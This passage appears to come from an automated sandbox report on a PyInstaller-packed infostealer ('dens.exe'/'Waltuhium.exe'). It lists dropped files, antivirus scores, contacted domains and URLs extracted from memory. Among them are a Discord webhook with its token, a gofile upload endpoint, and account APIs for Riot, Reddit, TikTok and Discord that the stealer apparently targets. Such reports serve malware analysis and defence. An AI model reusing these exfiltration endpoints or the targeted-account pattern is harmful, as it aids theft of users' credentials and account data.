            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\frozenlist\_frozenlist.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\libcrypto-3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\libffi-8.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\libssl-3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\multidict\_multidict.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\pyexpat.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\python3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\python312.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\select.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\autocommand-2.2.2.dist-info\METADATA0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\tomli-2.0.1.dist-info\METADATA0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\ucrtbase.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\unicodedata.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_helpers_c.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_quoting_c.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe39%ReversingLabsWin64.Infostealer.Generic
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://tidelift.com/badges/package/pypi/jaraco.context0%Avira URL Cloudsafe
            https://tidelift.com/subscription/pkg/pypi-inflect?utm_source=pypi-inflect&utm_medium=readme0%Avira URL Cloudsafe
            https://t.m0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            discord.com
            162.159.128.233
            truefalse
              high
              raw.githubusercontent.com
              185.199.108.133
              truefalse
                high
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  store1.gofile.io
                  45.112.123.227
                  truefalse
                    high
                    api.gofile.io
                    45.112.123.126
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://ip-api.com/jsonfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://account.riotgames.com/api/account/v1/userdens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://github.com/jaraco/keyring/commit/a85a7cbc6c909f8121660ed1f7b487f99a1c2bf7METADATA.0.drfalse
                            high
                            https://img.shields.io/pypi/pyversions/backports.tarfile.svgdens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drfalse
                              high
                              https://github.com/pyca/cryptography/issues/8996dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpfalse
                                high
                                https://github.com/astral-sh/ruffdens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drfalse
                                  high
                                  https://discord.gift/dens.exe, 00000001.00000003.2028227051.000002D9AB4D8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040430331.000002D9ABFF3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2037448253.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2033864513.000002D9AB513000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/python-attrs/attrs/issues/251dens.exe, 00000001.00000003.2047858320.000002D9AADF0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039084149.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041785184.000002D9AADEF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044813767.000002D9AADF0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2059506844.000002D9AADF0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039859652.000002D9AADEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesdens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.microsoftpowershell.exe, 00000052.00000002.1892090053.00000217AB814000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://readthedocs.org/projects/jaracofunctools/badge/?version=latestMETADATA0.0.drfalse
                                            high
                                            https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svgdens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/jaraco/jaraco.functoolsMETADATA0.0.drfalse
                                                high
                                                https://tidelift.com/badges/package/pypi/jaraco.contextMETADATA.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://tiktok.com/dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/aio-libs/aiohttp/discussions/6044dens.exe, 00000001.00000003.2052987876.000002D9AB1F2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065625241.000002D9AC640000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060619384.000002D9AB1F6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2045707437.000002D9AB1EF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/python/importlib_metadata/issuesdens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://python.orgdens.exe, 00000001.00000002.2063237923.000002D9ABD20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        high
                                                        https://docs.python.org/3/library/importlib.html#module-importlib.resourcesdens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#dens.exe, 00000001.00000003.1694605237.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694358511.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057589696.000002D9AA930000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://wheel.readthedocs.io/en/stable/news.htmlMETADATA14.0.drfalse
                                                              high
                                                              https://github.com/sponsors/hynekdens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://discord.com/api/vdens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://oauth.reddit.com/api/v1/medens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://importlib-metadata.readthedocs.io/dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://t.me/waltuhiumdens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.apache.org/licenses/LICENSE-2.0dens.exe, 00000000.00000003.1667879346.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1667879346.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1667942178.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://packaging.python.org/en/latest/specifications/core-metadata/dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64dens.exe, 00000001.00000003.1703254242.000002D9AAE13000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701312245.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701761331.000002D9AAE13000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042804568.000002D9AADFE000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039084149.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041785184.000002D9AADEF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2049463815.000002D9AAE14000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039859652.000002D9AADEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000034.00000003.1792575862.000001DE90656000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drfalse
                                                                                high
                                                                                https://github.com/jaraco/inflectdens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/pypa/packagingdens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://pypi.org/project/backports.tarfiledens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drfalse
                                                                                        high
                                                                                        https://readthedocs.org/projects/importlib-metadata/badge/?version=latestdens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://refspecs.linuxfoundation.org/elf/gabi4dens.exe, 00000001.00000003.1701168036.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701312245.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1702755471.000002D9AB26D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://store1.gofile.io/uploadFilexdens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://img.shields.io/pypi/pyversions/importlib_resources.svgdens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 00000052.00000002.1907212473.00000217BD754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1907212473.00000217BD611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AEF03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://readthedocs.org/projects/backportstarfile/badge/?version=latestdens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drfalse
                                                                                                    high
                                                                                                    https://discord.com/api/v9/users/dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://blog.jaraco.com/skeletondens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drfalse
                                                                                                        high
                                                                                                        https://github.com/python-attrs/attrs/issues/136dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&badens.exe, 00000001.00000003.2032142839.000002D9ABE69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/platformdirs/platformdirsdens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://fsf.org/dens.exe, 00000000.00000003.1676624069.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://img.shields.io/pypi/pyversions/inflect.svgdens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodedens.exe, 00000001.00000002.2062990584.000002D9ABAE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000052.00000002.1892866312.00000217AD5A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drfalse
                                                                                                                        high
                                                                                                                        https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.mdMETADATA14.0.drfalse
                                                                                                                          high
                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamedens.exe, 00000001.00000002.2057356883.000002D9AA7D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://discord.com/api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygdens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038212780.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2054186252.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040430331.000002D9AC036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/python-attrs/attrs/issues/1330)dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/jaraco/jaraco.context/actions?query=workflow%3A%22tests%22METADATA.0.drfalse
                                                                                                                                  high
                                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://importlib-resources.readthedocs.io/en/latest/?badge=latestdens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://pypi.org/project/build/).dens.exe, 00000001.00000002.2062436664.000002D9AB7B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703422725.000002D9AB24E000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703029573.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703084861.000002D9AB3D5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/pypa/wheelMETADATA14.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.python.org/dev/peps/pep-0427/METADATA14.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerdens.exe, 00000001.00000003.1694605237.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694358511.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057589696.000002D9AA930000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/python/cpython/issues/86361.dens.exe, 00000001.00000002.2057866234.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695470478.000002D9AAD61000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050249155.000002D9AA9A5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2053260653.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695759119.000002D9AAD61000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695730686.000002D9AACF6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695759119.000002D9AACF7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042588070.000002D9AA996000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2053626399.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1698481560.000002D9AA97E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://tidelift.com/subscription/pkg/pypi-inflect?utm_source=pypi-inflect&utm_medium=readmedens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000052.00000002.1892866312.00000217AEF03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.apache.org/licenses/dens.exe, 00000000.00000003.1667879346.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://crl.ver)svchost.exe, 00000034.00000002.2911368637.000001DE8AEBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=maindens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-filedens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduledens.exe, 00000001.00000002.2058377253.000002D9AAB70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesdens.exe, 00000001.00000002.2058377253.000002D9AAB70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://filepreviews.io/dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://img.shields.io/pypi/v/inflect.svgdens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.attrs.org/en/stable/why.html#data-classes)dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://img.shields.io/badge/skeleton-2024-informationaldens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drfalse
                                                                                                                                                                          high
